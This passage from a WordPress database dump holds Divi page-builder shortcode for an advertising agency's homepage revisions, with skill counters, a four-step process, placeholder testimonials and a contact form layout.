button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" title_text=\"home-office-07-1\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-04 20:09:46','2020-08-04 20:09:46','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/134-revision-v1/',0,'revision','',0),(421,1,'2020-08-04 20:13:46','2020-08-04 20:13:46','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" 